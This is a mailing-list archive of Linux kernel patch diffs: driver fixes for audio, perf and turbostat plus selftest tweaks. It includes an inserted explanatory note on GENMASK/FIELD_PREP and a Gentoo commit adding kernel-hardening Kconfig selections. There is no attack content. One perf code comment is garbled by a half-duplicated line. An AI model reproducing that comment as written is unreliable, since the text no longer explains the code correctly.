++			   CTRL1_STATUS2_SEL,
++			   FIELD_PREP(CTRL1_STATUS2_SEL, STATUS2_SEL_DDR_READ));
+ 
+ 	/* Make sure the dma is initially disabled */
+ 	__dma_enable(fifo, false);
+ 
+ 	/* Disable irqs until params are ready */
+ 	regmap_update_bits(fifo->map, FIFO_CTRL0,
+-			   CTRL0_INT_EN(FIFO_INT_MASK), 0);
++			   CTRL0_INT_EN, 0);
+ 
+ 	/* Clear any pending interrupt */
+ 	axg_fifo_ack_irq(fifo, FIFO_INT_MASK);
+diff --git a/sound/soc/meson/axg-fifo.h b/sound/soc/meson/axg-fifo.h
+index b63acd723c870..5b7d32c37991b 100644
+--- a/sound/soc/meson/axg-fifo.h
++++ b/sound/soc/meson/axg-fifo.h
+@@ -42,21 +42,19 @@ struct snd_soc_pcm_runtime;
+ 
+ #define FIFO_CTRL0			0x00
+ #define  CTRL0_DMA_EN			BIT(31)
+-#define  CTRL0_INT_EN(x)		((x) << 16)
++#define  CTRL0_INT_EN			GENMASK(23, 16)
+ #define  CTRL0_SEL_MASK			GENMASK(2, 0)
+ #define  CTRL0_SEL_SHIFT		0
+ #define FIFO_CTRL1			0x04
+-#define  CTRL1_INT_CLR(x)		((x) << 0)
+-#define  CTRL1_STATUS2_SEL_MASK		GENMASK(11, 8)
+-#define  CTRL1_STATUS2_SEL(x)		((x) << 8)
++#define  CTRL1_INT_CLR			GENMASK(7, 0)
++#define  CTRL1_STATUS2_SEL		GENMASK(11, 8)
+ #define   STATUS2_SEL_DDR_READ		0
+-#define  CTRL1_FRDDR_DEPTH_MASK		GENMASK(31, 24)
+-#define  CTRL1_FRDDR_DEPTH(x)		((x) << 24)
++#define  CTRL1_FRDDR_DEPTH		GENMASK(31, 24)
+ #define FIFO_START_ADDR			0x08
+ #define FIFO_FINISH_ADDR		0x0c
+ #define FIFO_INT_ADDR			0x10
+ #define FIFO_STATUS1			0x14
+-#define  STATUS1_INT_STS(x)		((x) << 0)
++#define  STATUS1_INT_STS		GENMASK(7, 0)
+ #define FIFO_STATUS2			0x18
+ #define FIFO_INIT_ADDR			0x24
+ #define FIFO_CTRL2			0x28
+diff --git a/sound/soc/meson/axg-frddr.c b/sound/soc/meson/axg-frddr.c
+index 61f9d417fd608..f0a9e181ee72a 100644
+--- a/sound/soc/meson/axg-frddr.c
++++ b/sound/soc/meson/axg-frddr.c
+@@ -7,6 +7,7 @@
+  * This driver implements the frontend playback DAI of AXG and G12A based SoCs
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/regmap.h>
+ #include <linux/module.h>
+@@ -59,8 +60,8 @@ static int axg_frddr_dai_hw_params(struct snd_pcm_substream *substream,
+ 	/* Trim the FIFO depth if the period is small to improve latency */
+ 	depth = min(period, fifo->depth);
+ 	val = (depth / AXG_FIFO_BURST) - 1;
+-	regmap_update_bits(fifo->map, FIFO_CTRL1, CTRL1_FRDDR_DEPTH_MASK,
+-			   CTRL1_FRDDR_DEPTH(val));
++	regmap_update_bits(fifo->map, FIFO_CTRL1, CTRL1_FRDDR_DEPTH,
++			   FIELD_PREP(CTRL1_FRDDR_DEPTH, val));
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/meson/axg-tdm-interface.c b/sound/soc/meson/axg-tdm-interface.c
+index 028383f949efd..272c3d2d68cb7 100644
+--- a/sound/soc/meson/axg-tdm-interface.c
++++ b/sound/soc/meson/axg-tdm-interface.c
+@@ -351,26 +351,31 @@ static int axg_tdm_iface_hw_params(struct snd_pcm_substream *substream,
+ 	return 0;
+ }
+ 
+-static int axg_tdm_iface_hw_free(struct snd_pcm_substream *substream,
++static int axg_tdm_iface_trigger(struct snd_pcm_substream *substream,
++				 int cmd,
+ 				 struct snd_soc_dai *dai)
+ {
+-	struct axg_tdm_stream *ts = snd_soc_dai_get_dma_data(dai, substream);
++	struct axg_tdm_stream *ts =
++		snd_soc_dai_get_dma_data(dai, substream);
+ 
+-	/* Stop all attached formatters */
+-	axg_tdm_stream_stop(ts);
++	switch (cmd) {
++	case SNDRV_PCM_TRIGGER_START:
++	case SNDRV_PCM_TRIGGER_RESUME:
++	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
++		axg_tdm_stream_start(ts);
++		break;
++	case SNDRV_PCM_TRIGGER_SUSPEND:
++	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
++	case SNDRV_PCM_TRIGGER_STOP:
++		axg_tdm_stream_stop(ts);
++		break;
++	default:
++		return -EINVAL;
++	}
+ 
+ 	return 0;
+ }
+ 
+-static int axg_tdm_iface_prepare(struct snd_pcm_substream *substream,
+-				 struct snd_soc_dai *dai)
+-{
+-	struct axg_tdm_stream *ts = snd_soc_dai_get_dma_data(dai, substream);
+-
+-	/* Force all attached formatters to update */
+-	return axg_tdm_stream_reset(ts);
+-}
+-
+ static int axg_tdm_iface_remove_dai(struct snd_soc_dai *dai)
+ {
+ 	if (dai->capture_dma_data)
+@@ -408,8 +413,7 @@ static const struct snd_soc_dai_ops axg_tdm_iface_ops = {
+ 	.set_fmt	= axg_tdm_iface_set_fmt,
+ 	.startup	= axg_tdm_iface_startup,
+ 	.hw_params	= axg_tdm_iface_hw_params,
+-	.prepare	= axg_tdm_iface_prepare,
+-	.hw_free	= axg_tdm_iface_hw_free,
++	.trigger	= axg_tdm_iface_trigger,
+ };
+ 
+ /* TDM Backend DAIs */
+diff --git a/sound/soc/meson/axg-toddr.c b/sound/soc/meson/axg-toddr.c
+index e9208e74e9659..f875304463e2f 100644
+--- a/sound/soc/meson/axg-toddr.c
++++ b/sound/soc/meson/axg-toddr.c
+@@ -5,6 +5,7 @@
+ 
+ /* This driver implements the frontend capture DAI of AXG based SoCs */
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/regmap.h>
+ #include <linux/module.h>
+@@ -19,12 +20,9 @@
+ #define CTRL0_TODDR_EXT_SIGNED		BIT(29)
+ #define CTRL0_TODDR_PP_MODE		BIT(28)
+ #define CTRL0_TODDR_SYNC_CH		BIT(27)
+-#define CTRL0_TODDR_TYPE_MASK		GENMASK(15, 13)
+-#define CTRL0_TODDR_TYPE(x)		((x) << 13)
+-#define CTRL0_TODDR_MSB_POS_MASK	GENMASK(12, 8)
+-#define CTRL0_TODDR_MSB_POS(x)		((x) << 8)
+-#define CTRL0_TODDR_LSB_POS_MASK	GENMASK(7, 3)
+-#define CTRL0_TODDR_LSB_POS(x)		((x) << 3)
++#define CTRL0_TODDR_TYPE		GENMASK(15, 13)
++#define CTRL0_TODDR_MSB_POS		GENMASK(12, 8)
++#define CTRL0_TODDR_LSB_POS		GENMASK(7, 3)
+ #define CTRL1_TODDR_FORCE_FINISH	BIT(25)
+ #define CTRL1_SEL_SHIFT			28
+ 
+@@ -76,12 +74,12 @@ static int axg_toddr_dai_hw_params(struct snd_pcm_substream *substream,
+ 	width = params_width(params);
+ 
+ 	regmap_update_bits(fifo->map, FIFO_CTRL0,
+-			   CTRL0_TODDR_TYPE_MASK |
+-			   CTRL0_TODDR_MSB_POS_MASK |
+-			   CTRL0_TODDR_LSB_POS_MASK,
+-			   CTRL0_TODDR_TYPE(type) |
+-			   CTRL0_TODDR_MSB_POS(TODDR_MSB_POS) |
+-			   CTRL0_TODDR_LSB_POS(TODDR_MSB_POS - (width - 1)));
++			   CTRL0_TODDR_TYPE |
++			   CTRL0_TODDR_MSB_POS |
++			   CTRL0_TODDR_LSB_POS,
++			   FIELD_PREP(CTRL0_TODDR_TYPE, type) |
++			   FIELD_PREP(CTRL0_TODDR_MSB_POS, TODDR_MSB_POS) |
++			   FIELD_PREP(CTRL0_TODDR_LSB_POS, TODDR_MSB_POS - (width - 1)));
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/tegra/tegra186_dspk.c b/sound/soc/tegra/tegra186_dspk.c
+index a74c980ee7753..d5a74e25371d2 100644
+--- a/sound/soc/tegra/tegra186_dspk.c
++++ b/sound/soc/tegra/tegra186_dspk.c
+@@ -1,8 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0-only
++// SPDX-FileCopyrightText: Copyright (c) 2020-2024 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
+ //
+ // tegra186_dspk.c - Tegra186 DSPK driver
+-//
+-// Copyright (c) 2020 NVIDIA CORPORATION. All rights reserved.
+ 
+ #include <linux/clk.h>
+ #include <linux/device.h>
+@@ -241,14 +240,14 @@ static int tegra186_dspk_hw_params(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
+-	cif_conf.client_bits = TEGRA_ACIF_BITS_24;
+-
+ 	switch (params_format(params)) {
+ 	case SNDRV_PCM_FORMAT_S16_LE:
+ 		cif_conf.audio_bits = TEGRA_ACIF_BITS_16;
++		cif_conf.client_bits = TEGRA_ACIF_BITS_16;
+ 		break;
+ 	case SNDRV_PCM_FORMAT_S32_LE:
+ 		cif_conf.audio_bits = TEGRA_ACIF_BITS_32;
++		cif_conf.client_bits = TEGRA_ACIF_BITS_24;
+ 		break;
+ 	default:
+ 		dev_err(dev, "unsupported format!\n");
+diff --git a/sound/soc/ti/davinci-mcasp.c b/sound/soc/ti/davinci-mcasp.c
+index ca5d1bb6ac59e..4edf5b27e136b 100644
+--- a/sound/soc/ti/davinci-mcasp.c
++++ b/sound/soc/ti/davinci-mcasp.c
+@@ -2416,12 +2416,6 @@ static int davinci_mcasp_probe(struct platform_device *pdev)
+ 
+ 	mcasp_reparent_fck(pdev);
+ 
+-	ret = devm_snd_soc_register_component(&pdev->dev, &davinci_mcasp_component,
+-					      &davinci_mcasp_dai[mcasp->op_mode], 1);
+-
+-	if (ret != 0)
+-		goto err;
+-
+ 	ret = davinci_mcasp_get_dma_type(mcasp);
+ 	switch (ret) {
+ 	case PCM_EDMA:
+@@ -2448,6 +2442,12 @@ static int davinci_mcasp_probe(struct platform_device *pdev)
+ 		goto err;
+ 	}
+ 
++	ret = devm_snd_soc_register_component(&pdev->dev, &davinci_mcasp_component,
++					      &davinci_mcasp_dai[mcasp->op_mode], 1);
++
++	if (ret != 0)
++		goto err;
++
+ no_audio:
+ 	ret = davinci_mcasp_init_gpiochip(mcasp);
+ 	if (ret) {
+diff --git a/sound/usb/line6/driver.c b/sound/usb/line6/driver.c
+index b67617b68e509..f4437015d43a7 100644
+--- a/sound/usb/line6/driver.c
++++ b/sound/usb/line6/driver.c
+@@ -202,7 +202,7 @@ int line6_send_raw_message_async(struct usb_line6 *line6, const char *buffer,
+ 	struct urb *urb;
+ 
+ 	/* create message: */
+-	msg = kmalloc(sizeof(struct message), GFP_ATOMIC);
++	msg = kzalloc(sizeof(struct message), GFP_ATOMIC);
+ 	if (msg == NULL)
+ 		return -ENOMEM;
+ 
+@@ -688,7 +688,7 @@ static int line6_init_cap_control(struct usb_line6 *line6)
+ 	int ret;
+ 
+ 	/* initialize USB buffers: */
+-	line6->buffer_listen = kmalloc(LINE6_BUFSIZE_LISTEN, GFP_KERNEL);
++	line6->buffer_listen = kzalloc(LINE6_BUFSIZE_LISTEN, GFP_KERNEL);
+ 	if (!line6->buffer_listen)
+ 		return -ENOMEM;
+ 
+@@ -697,7 +697,7 @@ static int line6_init_cap_control(struct usb_line6 *line6)
+ 		return -ENOMEM;
+ 
+ 	if (line6->properties->capabilities & LINE6_CAP_CONTROL_MIDI) {
+-		line6->buffer_message = kmalloc(LINE6_MIDI_MESSAGE_MAXLEN, GFP_KERNEL);
++		line6->buffer_message = kzalloc(LINE6_MIDI_MESSAGE_MAXLEN, GFP_KERNEL);
+ 		if (!line6->buffer_message)
+ 			return -ENOMEM;
+ 
+diff --git a/tools/include/linux/kernel.h b/tools/include/linux/kernel.h
+index 4b0673bf52c2e..07cfad817d539 100644
+--- a/tools/include/linux/kernel.h
++++ b/tools/include/linux/kernel.h
+@@ -8,6 +8,7 @@
+ #include <linux/build_bug.h>
+ #include <linux/compiler.h>
+ #include <linux/math.h>
++#include <linux/panic.h>
+ #include <endian.h>
+ #include <byteswap.h>
+ 
+diff --git a/tools/include/linux/mm.h b/tools/include/linux/mm.h
+index 43be27bcc897d..2f401e8c6c0bb 100644
+--- a/tools/include/linux/mm.h
++++ b/tools/include/linux/mm.h
+@@ -37,4 +37,9 @@ static inline void totalram_pages_add(long count)
+ {
+ }
+ 
++static inline int early_pfn_to_nid(unsigned long pfn)
++{
++	return 0;
++}
++
+ #endif
+diff --git a/tools/include/linux/panic.h b/tools/include/linux/panic.h
+new file mode 100644
+index 0000000000000..9c8f17a41ce8e
+--- /dev/null
++++ b/tools/include/linux/panic.h
+@@ -0,0 +1,19 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _TOOLS_LINUX_PANIC_H
++#define _TOOLS_LINUX_PANIC_H
++
++#include <stdarg.h>
++#include <stdio.h>
++#include <stdlib.h>
++
++static inline void panic(const char *fmt, ...)
++{
++	va_list argp;
++
++	va_start(argp, fmt);
++	vfprintf(stderr, fmt, argp);
++	va_end(argp);
++	exit(-1);
++}
++
++#endif
+diff --git a/tools/perf/util/unwind-libdw.c b/tools/perf/util/unwind-libdw.c
+index 94aa40f6e3482..9a7bdc0e14cc2 100644
+--- a/tools/perf/util/unwind-libdw.c
++++ b/tools/perf/util/unwind-libdw.c
+@@ -45,6 +45,7 @@ static int __report_module(struct addr_location *al, u64 ip,
+ {
+ 	Dwfl_Module *mod;
+ 	struct dso *dso = NULL;
++	Dwarf_Addr base;
+ 	/*
+ 	 * Some callers will use al->sym, so we can't just use the
+ 	 * cheaper thread__find_map() here.
+@@ -57,24 +58,36 @@ static int __report_module(struct addr_location *al, u64 ip,
+ 	if (!dso)
+ 		return 0;
+ 
++	/*
++	 * The generated JIT DSO files only map the code segment without
++	 * ELF headers.  Since JIT codes used to be packed in a memory
++	 * segment, calculating the base address using pgoff falls info
++	 * segment, calculating the base address using pgoff falls into
++	 * directly to pick the correct one.
++	 */
++	if (!strncmp(dso->long_name, "/tmp/jitted-", 12))
++		base = al->map->start;
++	else
++		base = al->map->start - al->map->pgoff;
++
+ 	mod = dwfl_addrmodule(ui->dwfl, ip);
+ 	if (mod) {
+ 		Dwarf_Addr s;
+ 
+ 		dwfl_module_info(mod, NULL, &s, NULL, NULL, NULL, NULL, NULL);
+-		if (s != al->map->start - al->map->pgoff)
+-			mod = 0;
++		if (s != base)
++			mod = NULL;
+ 	}
+ 
+ 	if (!mod)
+ 		mod = dwfl_report_elf(ui->dwfl, dso->short_name, dso->long_name, -1,
+-				      al->map->start - al->map->pgoff, false);
++				      base, false);
+ 	if (!mod) {
+ 		char filename[PATH_MAX];
+ 
+ 		if (dso__build_id_filename(dso, filename, sizeof(filename), false))
+ 			mod = dwfl_report_elf(ui->dwfl, dso->short_name, filename, -1,
+-					      al->map->start - al->map->pgoff, false);
++					      base, false);
+ 	}
+ 
+ 	if (mod) {
+diff --git a/tools/perf/util/unwind-libunwind-local.c b/tools/perf/util/unwind-libunwind-local.c
+index 81b6bd6e1536a..b276e36e3fb41 100644
+--- a/tools/perf/util/unwind-libunwind-local.c
++++ b/tools/perf/util/unwind-libunwind-local.c
+@@ -327,7 +327,7 @@ static int read_unwind_spec_eh_frame(struct dso *dso, struct unwind_info *ui,
+ 
+ 	maps__for_each_entry(ui->thread->maps, map) {
+ 		if (map->dso == dso && map->start < base_addr)
+-			base_addr = map->start;
++			base_addr = map->start - map->pgoff;
+ 	}
+ 	base_addr -= dso->data.elf_base_addr;
+ 	/* Address of .eh_frame_hdr */
+diff --git a/tools/power/x86/turbostat/turbostat.8 b/tools/power/x86/turbostat/turbostat.8
+index 3e1a4c4be001a..7112d4732d287 100644
+--- a/tools/power/x86/turbostat/turbostat.8
++++ b/tools/power/x86/turbostat/turbostat.8
+@@ -370,7 +370,7 @@ below the processor's base frequency.
+ 
+ Busy% = MPERF_delta/TSC_delta
+ 
+-Bzy_MHz = TSC_delta/APERF_delta/MPERF_delta/measurement_interval
++Bzy_MHz = TSC_delta*APERF_delta/MPERF_delta/measurement_interval
+ 
+ Note that these calculations depend on TSC_delta, so they
+ are not reliable during intervals when TSC_MHz is not running at the base frequency.
+diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c
+index b113900d94879..a41bad8e653bb 100644
+--- a/tools/power/x86/turbostat/turbostat.c
++++ b/tools/power/x86/turbostat/turbostat.c
+@@ -53,6 +53,8 @@
+ #define	NAME_BYTES 20
+ #define PATH_BYTES 128
+ 
++#define MAX_NOFILE 0x8000
++
+ enum counter_scope { SCOPE_CPU, SCOPE_CORE, SCOPE_PACKAGE };
+ enum counter_type { COUNTER_ITEMS, COUNTER_CYCLES, COUNTER_SECONDS, COUNTER_USEC };
+ enum counter_format { FORMAT_RAW, FORMAT_DELTA, FORMAT_PERCENT };
+@@ -1811,9 +1813,10 @@ int sum_counters(struct thread_data *t, struct core_data *c, struct pkg_data *p)
+ 	average.packages.rapl_dram_perf_status += p->rapl_dram_perf_status;
+ 
+ 	for (i = 0, mp = sys.pp; mp; i++, mp = mp->next) {
+-		if (mp->format == FORMAT_RAW)
+-			continue;
+-		average.packages.counter[i] += p->counter[i];
++		if ((mp->format == FORMAT_RAW) && (topo.num_packages == 0))
++			average.packages.counter[i] = p->counter[i];
++		else
++			average.packages.counter[i] += p->counter[i];
+ 	}
+ 	return 0;
+ }
+@@ -1966,7 +1969,7 @@ unsigned long long get_uncore_mhz(int package, int die)
+ {
+ 	char path[128];
+ 
+-	sprintf(path, "/sys/devices/system/cpu/intel_uncore_frequency/package_0%d_die_0%d/current_freq_khz", package,
++	sprintf(path, "/sys/devices/system/cpu/intel_uncore_frequency/package_%02d_die_%02d/current_freq_khz", package,
+ 		die);
+ 
+ 	return (snapshot_sysfs_counter(path) / 1000);
+@@ -6718,6 +6721,22 @@ void cmdline(int argc, char **argv)
+ 	}
+ }
+ 
++void set_rlimit(void)
++{
++	struct rlimit limit;
++
++	if (getrlimit(RLIMIT_NOFILE, &limit) < 0)
++		err(1, "Failed to get rlimit");
++
++	if (limit.rlim_max < MAX_NOFILE)
++		limit.rlim_max = MAX_NOFILE;
++	if (limit.rlim_cur < MAX_NOFILE)
++		limit.rlim_cur = MAX_NOFILE;
++
++	if (setrlimit(RLIMIT_NOFILE, &limit) < 0)
++		err(1, "Failed to set rlimit");
++}
++
+ int main(int argc, char **argv)
+ {
+ 	outf = stderr;
+@@ -6730,6 +6749,9 @@ int main(int argc, char **argv)
+ 
+ 	probe_sysfs();
+ 
++	if (!getuid())
++		set_rlimit();
++
+ 	turbostat_init();
+ 
+ 	msr_sum_record();
+diff --git a/tools/testing/selftests/bpf/prog_tests/bloom_filter_map.c b/tools/testing/selftests/bpf/prog_tests/bloom_filter_map.c
+index d2d9e965eba59..f79815b7e951b 100644
+--- a/tools/testing/selftests/bpf/prog_tests/bloom_filter_map.c
++++ b/tools/testing/selftests/bpf/prog_tests/bloom_filter_map.c
+@@ -2,6 +2,7 @@
+ /* Copyright (c) 2021 Facebook */
+ 
+ #include <sys/syscall.h>
++#include <limits.h>
+ #include <test_progs.h>
+ #include "bloom_filter_map.skel.h"
+ 
+@@ -21,6 +22,11 @@ static void test_fail_cases(void)
+ 	if (!ASSERT_LT(fd, 0, "bpf_map_create bloom filter invalid value size 0"))
+ 		close(fd);
+ 
++	/* Invalid value size: too big */
++	fd = bpf_map_create(BPF_MAP_TYPE_BLOOM_FILTER, NULL, 0, INT32_MAX, 100, NULL);
++	if (!ASSERT_LT(fd, 0, "bpf_map_create bloom filter invalid value too large"))
++		close(fd);
++
+ 	/* Invalid max entries size */
+ 	fd = bpf_map_create(BPF_MAP_TYPE_BLOOM_FILTER, NULL, 0, sizeof(value), 0, NULL);
+ 	if (!ASSERT_LT(fd, 0, "bpf_map_create bloom filter invalid max entries size"))
+diff --git a/tools/testing/selftests/timers/valid-adjtimex.c b/tools/testing/selftests/timers/valid-adjtimex.c
+index 48b9a803235a8..d13ebde203221 100644
+--- a/tools/testing/selftests/timers/valid-adjtimex.c
++++ b/tools/testing/selftests/timers/valid-adjtimex.c
+@@ -21,9 +21,6 @@
+  *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+  *   GNU General Public License for more details.
+  */
+-
+-
+-
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <time.h>
+@@ -62,45 +59,47 @@ int clear_time_state(void)
+ #define NUM_FREQ_OUTOFRANGE 4
+ #define NUM_FREQ_INVALID 2
+ 
++#define SHIFTED_PPM (1 << 16)
++
+ long valid_freq[NUM_FREQ_VALID] = {
+-	-499<<16,
+-	-450<<16,
+-	-400<<16,
+-	-350<<16,
+-	-300<<16,
+-	-250<<16,
+-	-200<<16,
+-	-150<<16,
+-	-100<<16,
+-	-75<<16,
+-	-50<<16,
+-	-25<<16,
+-	-10<<16,
+-	-5<<16,
+-	-1<<16,
++	 -499 * SHIFTED_PPM,
++	 -450 * SHIFTED_PPM,
++	 -400 * SHIFTED_PPM,
++	 -350 * SHIFTED_PPM,
++	 -300 * SHIFTED_PPM,
++	 -250 * SHIFTED_PPM,
++	 -200 * SHIFTED_PPM,
++	 -150 * SHIFTED_PPM,
++	 -100 * SHIFTED_PPM,
++	  -75 * SHIFTED_PPM,
++	  -50 * SHIFTED_PPM,
++	  -25 * SHIFTED_PPM,
++	  -10 * SHIFTED_PPM,
++	   -5 * SHIFTED_PPM,
++	   -1 * SHIFTED_PPM,
+ 	-1000,
+-	1<<16,
+-	5<<16,
+-	10<<16,
+-	25<<16,
+-	50<<16,
+-	75<<16,
+-	100<<16,
+-	150<<16,
+-	200<<16,
+-	250<<16,
+-	300<<16,
+-	350<<16,
+-	400<<16,
+-	450<<16,
+-	499<<16,
++	    1 * SHIFTED_PPM,
++	    5 * SHIFTED_PPM,
++	   10 * SHIFTED_PPM,
++	   25 * SHIFTED_PPM,
++	   50 * SHIFTED_PPM,
++	   75 * SHIFTED_PPM,
++	  100 * SHIFTED_PPM,
++	  150 * SHIFTED_PPM,
++	  200 * SHIFTED_PPM,
++	  250 * SHIFTED_PPM,
++	  300 * SHIFTED_PPM,
++	  350 * SHIFTED_PPM,
++	  400 * SHIFTED_PPM,
++	  450 * SHIFTED_PPM,
++	  499 * SHIFTED_PPM,
+ };
+ 
+ long outofrange_freq[NUM_FREQ_OUTOFRANGE] = {
+-	-1000<<16,
+-	-550<<16,
+-	550<<16,
+-	1000<<16,
++	-1000 * SHIFTED_PPM,
++	 -550 * SHIFTED_PPM,
++	  550 * SHIFTED_PPM,
++	 1000 * SHIFTED_PPM,
+ };
+ 
+ #define LONG_MAX (~0UL>>1)


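A side note on the sound/soc/meson hunks in the patch above: the conversion from open-coded shift macros such as CTRL0_INT_EN(x) ((x) << 16) to GENMASK() masks paired with FIELD_PREP()/FIELD_GET() is a common kernel cleanup, since the helpers derive the shift from the mask itself. The standalone sketch below illustrates the idiom; the macro bodies are simplified stand-ins for the kernel's <linux/bits.h> and <linux/bitfield.h> definitions (the real ones add compile-time checks that the value fits the field), and __builtin_ctz assumes a GCC/Clang compiler.

#include <stdint.h>
#include <stdio.h>

/* Simplified stand-ins for the kernel's GENMASK()/FIELD_PREP()/FIELD_GET();
 * the real definitions add compile-time checks that the value fits. */
#define GENMASK(h, l)		((~0u << (l)) & (~0u >> (31 - (h))))
#define FIELD_PREP(mask, val)	(((val) << __builtin_ctz(mask)) & (mask))
#define FIELD_GET(mask, reg)	(((reg) & (mask)) >> __builtin_ctz(mask))

/* Field layout taken from the axg-fifo.h hunk above */
#define CTRL0_INT_EN		GENMASK(23, 16)

int main(void)
{
	/* The old style forced every caller to know the shift: (0x04 << 16).
	 * With FIELD_PREP() the shift is derived from the mask itself. */
	uint32_t reg = FIELD_PREP(CTRL0_INT_EN, 0x04);

	printf("reg = 0x%08x, field = 0x%02x\n",
	       (unsigned int)reg, (unsigned int)FIELD_GET(CTRL0_INT_EN, reg));
	return 0;
}
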
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-05-05 18:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-05-05 18:10 UTC (permalink / raw
  To: gentoo-commits

commit:     5d2714f1df1d6389f8b3907e9264f212004ae185
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun May  5 18:09:49 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun May  5 18:09:49 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5d2714f1

Update to KSPP patch

Bug: https://bugs.gentoo.org/930733

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 4567_distro-Gentoo-Kconfig.patch | 47 ++++++++++++++++++----------------------
 1 file changed, 21 insertions(+), 26 deletions(-)

diff --git a/4567_distro-Gentoo-Kconfig.patch b/4567_distro-Gentoo-Kconfig.patch
index 4dcd85ca..87b8fa95 100644
--- a/4567_distro-Gentoo-Kconfig.patch
+++ b/4567_distro-Gentoo-Kconfig.patch
@@ -6,9 +6,9 @@
  source "Documentation/Kconfig"
 +
 +source "distro/Kconfig"
---- /dev/null	2024-04-27 13:10:54.188000027 -0400
-+++ b/distro/Kconfig	2024-04-27 18:16:00.549054795 -0400
-@@ -0,0 +1,295 @@
+--- /dev/null	2024-05-05 10:40:37.103999988 -0400
++++ b/distro/Kconfig	2024-05-05 13:37:37.699554927 -0400
+@@ -0,0 +1,310 @@
 +menu "Gentoo Linux"
 +
 +config GENTOO_LINUX
@@ -178,7 +178,7 @@
 +		to unmet dependencies. Search for GENTOO_KERNEL_SELF_PROTECTION_COMMON and search for 
 +		GENTOO_KERNEL_SELF_PROTECTION_{X86_64, ARM64, X86_32, ARM} for dependency information on your 
 +		specific architecture.
-+		Note 2: Please see the URL above for numeric settings, e.g. CONFIG_DEFAULT_MMAP_MIN_ADDR=65536 
++		Note 2: Please see the URL above for numeric settings, e.g. CONFIG_DEFAULT_MMAP_MIN_ADDR=65536
 +		for X86_64
 +
 +if GENTOO_KERNEL_SELF_PROTECTION
@@ -201,10 +201,13 @@
 +	select DEBUG_SG
 +	select HARDENED_USERCOPY if HAVE_HARDENED_USERCOPY_ALLOCATOR=y
 +	select KFENCE if HAVE_ARCH_KFENCE && (!SLAB || SLUB)
++	select PAGE_TABLE_CHECK if ARCH_SUPPORTS_PAGE_TABLE_CHECK=y && EXCLUSIVE_SYSTEM_RAM=y  
++	select PAGE_TABLE_CHECK_ENFORCED if PAGE_TABLE_CHECK=y
 +	select RANDOMIZE_KSTACK_OFFSET_DEFAULT if HAVE_ARCH_RANDOMIZE_KSTACK_OFFSET && (INIT_STACK_NONE || !CC_IS_CLANG || CLANG_VERSION>=140000)
 +	select SECURITY_LANDLOCK
 +	select SCHED_CORE if SCHED_SMT
 +	select BUG_ON_DATA_CORRUPTION
++	select RANDOM_KMALLOC_CACHE if SLUB_TINY=n
 +	select SCHED_STACK_END_CHECK
 +	select SECCOMP if HAVE_ARCH_SECCOMP
 +	select SECCOMP_FILTER if HAVE_ARCH_SECCOMP_FILTER
@@ -245,11 +248,13 @@
 +	default n
 +	
 +	select GCC_PLUGIN_STACKLEAK
++	select X86_KERNEL_IBT if CC_HAS_IBT=y && HAVE_OBJTOOL=y && (!LD_IS_LLD=n || LLD_VERSION>=140000) 
 +	select LEGACY_VSYSCALL_NONE
 + 	select PAGE_TABLE_ISOLATION
 +	select RANDOMIZE_BASE
 +	select RANDOMIZE_MEMORY
 +	select RELOCATABLE
++	select X86_USER_SHADOW_STACK if AS_WRUSS=Y
 +	select VMAP_STACK
 +
 +
@@ -259,11 +264,21 @@
 +	depends on ARM64
 +	default n
 +
-+	select RANDOMIZE_BASE
-+	select RELOCATABLE
++	select ARM64_BTI
++	select ARM64_E0PD
++	select ARM64_EPAN if ARM64_PAN=y
++	select ARM64_MTE if (ARM64_AS_HAS_MTE=y && ARM64_TAGGED_ADDR_ABI=y ) && ( AS_HAS_ARMV8_5=y ) && ( AS_HAS_LSE_ATOMICS=y ) && ( ARM64_PAN=y )
++	select ARM64_PTR_AUTH
++	select ARM64_PTR_AUTH_KERNEL if ( ARM64_PTR_AUTH=y ) && (( CC_HAS_SIGN_RETURN_ADDRESS=y || CC_HAS_BRANCH_PROT_PAC_RET=y ) && AS_HAS_ARMV8_3=y ) && ( LD_IS_LLD=y || LD_VERSION >= 23301 || ( CC_IS_GCC=y && GCC_VERSION < 90100 )) && (CC_IS_CLANG=n || AS_HAS_CFI_NEGATE_RA_STATE=y ) && ((FUNCTION_GRAPH_TRACER=n || DYNAMIC_FTRACE_WITH_ARGS=y ))
++	select ARM64_BTI_KERNEL if ( ARM64_BTI=y ) && ( ARM64_PTR_AUTH_KERNEL=y ) && ( CC_HAS_BRANCH_PROT_PAC_RET_BTI=y ) && (CC_IS_GCC=n || GCC_VERSION >= 100100 ) && (CC_IS_GCC=n ) && ((FUNCTION_GRAPH_TRACE=n || DYNAMIC_FTRACE_WITH_ARG=y ))
 +	select ARM64_SW_TTBR0_PAN
 +	select CONFIG_UNMAP_KERNEL_AT_EL0
 +	select GCC_PLUGIN_STACKLEAK
++	select KASAN_HW_TAGS if HAVE_ARCH_KASAN_HW_TAGS=y
++	select RANDOMIZE_BASE
++	select RELOCATABLE
++	select SHADOW_CALL_STACK if ARCH_SUPPORTS_SHADOW_CALL_STACK=y && (DYNAMIC_FTRACE_WITH_ARGS=y || DYNAMIC_FTRACE_WITH_REGS=y || FUNCTION_GRAPH_TRACER=n) && MMU=y 
